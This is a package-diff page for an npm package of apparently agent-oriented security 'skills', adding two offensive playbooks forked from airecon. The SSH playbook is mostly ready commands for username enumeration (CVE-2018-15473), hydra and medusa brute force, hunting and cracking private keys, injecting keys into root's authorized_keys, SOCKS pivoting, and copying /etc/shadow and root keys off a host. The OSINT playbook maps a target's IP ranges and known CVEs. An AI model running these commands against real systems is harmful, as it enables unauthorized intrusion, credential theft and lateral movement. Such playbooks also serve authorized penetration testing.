npm - @aegis-scan/skills - Versions diffs - 0.4.0 → 0.5.1 - Mend

@aegis-scan/skills 0.4.0 → 0.5.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (386) hide show

package/skills/offensive/airecon-fork/protocols-ssh/SKILL.md ADDED Viewed

@@ -0,0 +1,287 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: ssh
+description: SSH security testing covering user enumeration, brute force, key analysis, tunneling for pivoting, known CVEs, and SSH-specific misconfiguration testing
+---
+# SSH Security Testing
+SSH (Secure Shell) is on nearly every server. Attack surface: username enumeration, credential brute force, weak/reused SSH keys, authorized_keys misconfiguration, SSH tunneling for pivoting, and known CVEs including timing-based user enumeration.
+---
+## Reconnaissance
+### Discovery
+    # Port scanning
+    nmap -p 22,2222,22222 <target> -sV --open
+    # Common SSH ports:
+    # 22    — standard
+    # 2222  — common alternative
+    # 22222 — less common alternative
+    # SSH banner grab (version + OS info):
+    nc <target> 22
+    # SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4
+    # Reveals: OpenSSH version, OS distribution
+    nmap -p 22 --script ssh-hostkey,ssh2-enum-algos <target>
+---
+## Username Enumeration
+### CVE-2018-15473 — OpenSSH Username Enumeration
+Affects OpenSSH < 7.7 — timing difference reveals valid usernames:
+    # Tool: https://github.com/Sait-Nuri/CVE-2018-15473
+    python3 CVE-2018-15473.py --target <target> --username admin
+    # "admin" is a valid user / "admin" is an invalid user
+    # Automated with wordlist:
+    python3 CVE-2018-15473.py --target <target> --userList /usr/share/seclists/Usernames/top-usernames-shortlist.txt
+    # Metasploit:
+    use auxiliary/scanner/ssh/ssh_enumusers
+    set RHOSTS <target>
+    set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt
+    run
+    # Common SSH usernames to test:
+    root, admin, ubuntu, ec2-user, centos, debian, pi, vagrant, git, deploy,
+    www-data, postgres, mysql, oracle, hadoop, ansible, jenkins
+---
+## Brute Force
+    # Hydra (most common):
+    hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<target>
+    hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
+          -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
+          ssh://<target> -t 4
+    # Medusa:
+    medusa -h <target> -u root -P /usr/share/wordlists/rockyou.txt -M ssh
+    # nmap brute (slower):
+    nmap --script ssh-brute -p 22 <target>
+    # Patator (parallel, smarter throttling):
+    patator ssh_login host=<target> user=FILE0 password=FILE1 \
+      0=/usr/share/seclists/Usernames/common-usernames.txt \
+      1=/usr/share/wordlists/rockyou.txt \
+      -x ignore:mesg='Authentication failed'
+    # Rate: limit to 4 threads to avoid lockout
+    # Target MaxAuthTries usually 6 — stop after 5 attempts per user
+---
+## SSH Key Attacks
+### Weak Key Generation
+    # Debian/Ubuntu 2008 OpenSSL RNG bug (CVE-2008-0166):
+    # Keys generated with broken entropy — only 32,768 possible key pairs
+    # Download pre-computed keysets:
+    # https://github.com/g0tmi1k/debian-ssh
+    # Test if server uses a Debian weak key:
+    python3 -c "
+    # Download blacklist and check against server's host key
+    # curl https://raw.githubusercontent.com/g0tmi1k/debian-ssh/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2
+    "
+### Finding SSH Private Keys
+    # Scan target for exposed private keys (via LFI, file read, misconfigured web):
+    GET /.ssh/id_rsa
+    GET /.ssh/id_dsa
+    GET /.ssh/id_ecdsa
+    GET /.ssh/id_ed25519
+    GET /home/<user>/.ssh/id_rsa
+    GET /root/.ssh/id_rsa
+    GET /backup/id_rsa
+    GET /id_rsa
+    GET /key.pem
+    GET /server.key
+    # In git repositories:
+    git log --all -p | grep -E "BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY"
+    trufflehog git . --json | grep ssh
+    # Check authorized_keys (via LFI):
+    GET /root/.ssh/authorized_keys
+    GET /home/<user>/.ssh/authorized_keys
+### Cracking Encrypted SSH Keys
+    # If private key is passphrase-protected:
+    ssh2john id_rsa > id_rsa.hash
+    john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
+    # hashcat:
+    python3 ssh2john.py id_rsa | tee id_rsa.hash
+    hashcat -m 22921 id_rsa.hash /usr/share/wordlists/rockyou.txt   # RSA
+### Injecting SSH Keys
+    # If write access exists (via RCE, Redis, file upload):
+    # 1. Generate key pair:
+    ssh-keygen -t rsa -b 4096 -f /tmp/attack_key -N ""
+    # 2. Append public key to authorized_keys:
+    echo "$(cat /tmp/attack_key.pub)" >> /root/.ssh/authorized_keys
+    # Or overwrite entirely if file doesn't exist
+    # 3. Connect:
+    ssh -i /tmp/attack_key root@<target>
+---
+## SSH Tunneling (Pivoting)
+### Local Port Forwarding
+Forward a remote service to your local machine:
+    # Access remote service (e.g., internal web app on port 8080):
+    ssh -L 8080:localhost:8080 user@<target>
+    # Now browse http://localhost:8080 = remote's localhost:8080
+    # Access internal network host:
+    ssh -L 5432:internal-db:5432 user@<target>
+    # psql -h localhost -p 5432 = connects to internal-db:5432
+### Remote Port Forwarding
+Expose attacker service through the target:
+    # Allow target to connect back to attacker service:
+    ssh -R 4444:localhost:4444 user@<target>
+    # On target: nc localhost 4444 = connects to attacker's 4444
+### Dynamic Port Forwarding (SOCKS Proxy)
+Route all traffic through target as SOCKS proxy:
+    # Create SOCKS5 proxy on local port 1080:
+    ssh -D 1080 user@<target>
+    # Use with proxychains:
+    # Edit /etc/proxychains.conf: socks5 127.0.0.1 1080
+    proxychains nmap -sT -p 80,443,8080 <internal_network>/24
+    proxychains curl http://internal-app/
+    proxychains hydra -l admin -P rockyou.txt http-get://internal-server/
+### Jump Host / ProxyJump
+Pivot through intermediary hosts:
+    # Jump through bastion to internal server:
+    ssh -J user@bastion user@internal-server
+    # Multi-hop:
+    ssh -J user@hop1,user@hop2 user@final-target
+    # SSH config for persistent pivoting:
+    Host internal
+      HostName 10.0.0.100
+      User admin
+      ProxyJump user@bastion.target.com
+      IdentityFile ~/.ssh/attack_key
+---
+## SSH Configuration Misconfigurations
+    # Check sshd_config for dangerous settings:
+    cat /etc/ssh/sshd_config
+    # Dangerous settings:
+    PermitRootLogin yes              # Root login enabled
+    PasswordAuthentication yes       # Password auth (brute-forceable)
+    PermitEmptyPasswords yes         # Empty password = instant login
+    AllowAgentForwarding yes         # Agent forwarding = key theft possible
+    X11Forwarding yes                # X11 = display capture / GUI access
+    UseDNS no                        # Fine (performance)
+    MaxAuthTries 6                   # Default — reduce for brute-force protection
+    AuthorizedKeysFile .ssh/authorized_keys %h/.ssh/authorized_keys2   # Both files
+    # Check if SSH agent forwarding is enabled and abusable:
+    # If PermitAgentForwarding yes + attacker has root on jump host:
+    # Read /tmp/ssh-XXXXXXXX/agent.XXXX socket = steal forwarded SSH agent
+---
+## CVE Exploitation
+| CVE | Component | Impact |
+|-----|-----------|--------|
+| CVE-2023-38408 | OpenSSH | Remote code execution via ssh-agent |
+| CVE-2023-48795 | OpenSSH | Terrapin: MITM protocol downgrade |
+| CVE-2018-15473 | OpenSSH < 7.7 | Username enumeration |
+| CVE-2016-0777 | OpenSSH | Roaming info leak (private key) |
+| CVE-2008-0166 | Debian OpenSSL | Predictable private keys |
+    # CVE-2023-48795 (Terrapin) — SSH protocol downgrade:
+    # Weakens connection security via MITM prefix truncation
+    # Check: ssh-audit <target>
+    pip install ssh-audit
+    ssh-audit <target>
+    # Look for: "KEX strict mode" not supported = potentially vulnerable
+    # CVE-2023-38408 — OpenSSH ssh-agent RCE:
+    # Affects OpenSSH < 9.3p2 with agent forwarding and PKCS#11
+    # Requires agent forwarding to a malicious server
+---
+## SSH Key and Algorithm Audit
+    # Check supported algorithms (weak algorithms = downgrade attack):
+    ssh-audit <target>               # Full SSH security audit
+    nmap --script ssh2-enum-algos <target>
+    # Weak algorithms to look for:
+    # KEX: diffie-hellman-group1-sha1, diffie-hellman-group14-sha1
+    # Encryption: arcfour, blowfish-cbc, 3des-cbc
+    # MAC: hmac-md5, hmac-sha1-96
+    # Test connection with weak cipher (if supported):
+    ssh -c 3des-cbc user@<target>    # Very old cipher
+---
+## Sensitive File Extraction via SSH/SCP
+    # If credentials obtained:
+    scp user@<target>:/etc/shadow ./shadow                    # Password hashes
+    scp user@<target>:/root/.ssh/id_rsa ./root_key            # Root SSH key
+    scp user@<target>:/var/www/html/config.php ./config.php   # Web app config
+    scp -r user@<target>:/home/ ./home_dirs/                  # All home dirs
+    # Find secrets on the filesystem:
+    ssh user@<target> "find / -name '*.env' -o -name 'id_rsa' -o -name 'credentials*' 2>/dev/null | head -50"
+    ssh user@<target> "grep -r 'password' /etc/ --include='*.conf' 2>/dev/null"
+---
+## Pro Tips
+1. CVE-2018-15473 username enumeration works on OpenSSH < 7.7 — still extremely common
+2. Weak SSH keys from Debian 2008 bug are still active on some old systems — check host keys
+3. SSH agent forwarding abuse requires root on jump host but yields all forwarded keys
+4. Dynamic SOCKS proxy (`-D 1080`) + proxychains enables full network pivot in one command
+5. Always check `/root/.ssh/authorized_keys` for existing keys revealing other compromised systems
+6. PermitEmptyPasswords = instant root login with empty password — test with `ssh root@target` (press Enter)
+7. `ssh-audit` reveals weak algorithms and known CVEs in one scan
+## Summary
+SSH testing = CVE-2018-15473 username enumeration + brute force (hydra) + private key search (LFI/git history) + key injection via other RCE. SSH is rarely the entry point for external targets but is critical for lateral movement — set up SOCKS proxy (`-D 1080`) immediately after gaining any SSH access for full network pivot. Agent forwarding abuse on compromised jump hosts steals all users' SSH keys in transit.

package/skills/offensive/airecon-fork/reconnaissance-asn-whois-osint/SKILL.md ADDED Viewed

@@ -0,0 +1,236 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: asn-whois-osint
+description: ASN/CIDR discovery, WHOIS lookups, BGP enumeration, IP range mapping, and OSINT passive reconnaissance to map the full attack surface of an organization without active scanning
+---
+# ASN / CIDR / WHOIS / OSINT Reconnaissance
+Passive infrastructure mapping: find ALL IP ranges owned by a target using ASN lookups, WHOIS, BGP data, and OSINT — before any active scanning. Goal: build a complete picture of the organization's internet-facing assets.
+---
+## WHOIS
+### Domain WHOIS
+    whois target.com
+    # Key fields to extract:
+    # Registrar, Registrant Org, Registrant Email, Name Servers, Admin Email
+    # Admin email → pivot to find other domains registered by same person/org
+    # Bulk domain WHOIS via web_search:
+    web_search("whois target.com")
+    web_search("site:whois.domaintools.com target.com")
+### IP WHOIS (find IP owner and CIDR block)
+    whois 1.2.3.4
+    # Key fields: netname, org, CIDR, route, abuse email
+    # CIDR block revealed = scan entire range if in scope
+    # Example output:
+    # NetRange: 192.0.2.0 - 192.0.2.255
+    # CIDR: 192.0.2.0/24
+    # NetName: TARGET-CORP-NET
+    # Organization: Target Corp (TC-1234)
+---
+## ASN Lookup
+ASN (Autonomous System Number) = organization's routing identity. One ASN = all their IP ranges.
+    # Find ASN by organization name:
+    whois -h whois.radb.net '!gAS<ASN>'
+    # Or use amass:
+    amass intel -org "Target Corp"
+    # Returns: ASN numbers associated with that org name
+    # Find ASN by IP:
+    whois -h whois.cymru.com " -v 1.2.3.4"
+    # Returns: ASN | IP | BGP Prefix | CC | Registry | Allocated | AS Name
+    # Bulk IPs:
+    whois -h whois.cymru.com " -v -f" << EOF
+    1.2.3.4
+    5.6.7.8
+    EOF
+    # Online alternatives (via web_search):
+    web_search("ASN lookup Target Corp site:bgp.he.net")
+    web_search("site:ipinfo.io \"Target Corp\" ASN")
+---
+## CIDR / IP Range Discovery
+### From ASN → All IP ranges
+    # Once you have the ASN (e.g., AS12345):
+    whois -h whois.radb.net -- '-i origin AS12345' | grep -E "^route:"
+    # Lists all IP prefixes announced by that ASN
+    # Using amass:
+    amass intel -asn 12345
+    # Returns all CIDR blocks for that ASN
+    # asnmap (ProjectDiscovery — no API key needed):
+    asnmap -a AS12345                        # CIDR blocks for ASN
+    asnmap -org "Target Corp"               # Find ASN by org name + get CIDRs
+    asnmap -d target.com                    # ASN lookup via domain
+    asnmap -a AS12345 -json > output/asn_ranges.json
+    # Install: go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest
+    # Pipe to nrich for passive enrichment (no active scan):
+    asnmap -a AS12345 | mapcidr -silent | nrich -
+    # → gets all known open ports/CVEs for every IP in the ASN range from Shodan InternetDB
+    # mapcidr — expand CIDR to individual IPs:
+    echo "192.0.2.0/24" | mapcidr -silent
+    # Install: go install github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
+---
+## BGP / Routing Intelligence
+    # Hurricane Electric BGP Toolkit (via web_search):
+    web_search("site:bgp.he.net \"Target Corp\"")
+    # Reveals: ASN, all prefixes, peer ASNs, routing table
+    # BGPView (via web_search):
+    web_search("site:bgpview.io \"Target Corp\"")
+    # RIPE NCC (for European orgs):
+    web_search("site:stat.ripe.net \"Target Corp\"")
+    # PeeringDB (find network presence):
+    web_search("site:peeringdb.com \"Target Corp\"")
+---
+## IP Enrichment with nrich (no API key)
+nrich queries Shodan InternetDB — passive, no active scan:
+    # Single IP enrichment:
+    echo "1.2.3.4" | nrich -
+    # Bulk IPs from file:
+    cat output/live_ips.txt | nrich -
+    # JSON output:
+    cat output/live_ips.txt | nrich - -json > output/nrich_enriched.json
+    # nrich returns per IP (from Shodan InternetDB):
+    # - open_ports: [80, 443, 22, 3306]
+    # - cves: ["CVE-2021-44228", "CVE-2023-38408"]
+    # - cpes: ["cpe:/a:apache:http_server:2.4.49"]
+    # - tags: ["self-signed", "starttls"]
+    # Workflow: ASN → CIDR → IPs → nrich (passive pre-check) → nmap (targeted active scan)
+    asnmap -a AS12345 | mapcidr -silent | nrich - -json | tee output/nrich_results.json
+---
+## Subdomain / DNS OSINT
+    # Passive DNS — find all subdomains without active brute force:
+    # amass (comprehensive passive):
+    amass enum -passive -d target.com -o output/amass_passive.txt
+    # subfinder (ProjectDiscovery — multi-source passive):
+    subfinder -d target.com -o output/subfinder.txt
+    subfinder -d target.com -all -recursive -o output/subfinder_full.txt
+    # Certificate transparency (crt.sh):
+    curl -s "https://crt.sh/?q=%.target.com&output=json" | \
+      jq -r '.[].name_value' | sort -u > output/crtsh_subdomains.txt
+    # Or via web_search:
+    web_search("site:crt.sh %.target.com")
+    # dnsx — DNS resolution + validation:
+    cat output/subfinder.txt | dnsx -a -resp -o output/resolved.txt
+---
+## Reverse WHOIS / Email Pivot
+Find all domains registered by the same organization:
+    # Via web_search:
+    web_search("reverse whois \"Target Corp\" site:viewdns.info")
+    web_search("reverse whois \"admin@target.com\" site:viewdns.info")
+    # DomainTools reverse WHOIS (via web_search):
+    web_search("site:domaintools.com \"Target Corp\" reverse whois")
+    # Find other domains registered with same email:
+    web_search("\"registrant@target.com\" whois domains")
+---
+## IP Geolocation & ISP Info
+    # ipinfo.io (no API key for basic use):
+    curl ipinfo.io/1.2.3.4
+    # Returns: ip, city, region, country, org (ISP/ASN), postal, loc (coordinates)
+    # Bulk lookup via web_search:
+    web_search("site:ipinfo.io 1.2.3.4")
+---
+## Full Passive Recon Workflow
+    # Step 1: Domain → IP → WHOIS
+    whois target.com                         # Registrant info, name servers
+    host target.com                          # A record → main IP
+    whois <IP>                               # CIDR block + org name
+    # Step 2: Org name → ASN → all CIDRs
+    asnmap -org "Target Corp"               # Or: amass intel -org "Target Corp"
+    # Step 3: CIDRs → all IPs → passive enrichment
+    asnmap -a AS12345 | mapcidr -silent > output/all_ips.txt
+    cat output/all_ips.txt | nrich - -json > output/nrich_results.json
+    # Review: CVEs, open ports, interesting services — without touching a single IP
+    # Step 4: Subdomain enumeration
+    subfinder -d target.com -o output/subdomains.txt
+    cat output/subdomains.txt | dnsx -a -resp -o output/resolved.txt
+    # Step 5: Enrich resolved IPs
+    cat output/resolved.txt | grep -oE '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | \
+      sort -u | nrich - -json >> output/nrich_results.json
+    # Step 6: Google dork (see dorking.md)
+    web_search("site:target.com")
+    web_search("site:target.com filetype:env")
+---
+## Pro Tips
+1. `asnmap -org "Target Corp"` often finds IP ranges the org doesn't publicize — shadow IT
+2. `nrich` is completely passive — queries Shodan's pre-built InternetDB, no active probing
+3. WHOIS admin email pivot often reveals subsidiary domains not linked from main site
+4. Certificate transparency (crt.sh) finds internal/staging subdomains using wildcard certs
+5. BGP data from bgp.he.net shows peering relationships → find CDN/cloud providers used
+6. Always run nrich BEFORE nmap — filter targets by known CVEs to prioritize scanning
+## Summary
+Passive infrastructure mapping order:
+1. `whois target.com` → registrant info, name servers
+2. `whois <IP>` → CIDR block, org name
+3. `asnmap -org "Target Corp"` → all ASNs + CIDRs
+4. `mapcidr` + `nrich` → all IPs enriched with CVEs/ports from Shodan InternetDB (no API key)
+5. `subfinder` + `dnsx` → all subdomains resolved
+6. `crt.sh` → certificate transparency for hidden subdomains
+7. Reverse WHOIS on admin email → find related domains
+Full picture built without sending a single packet to the target.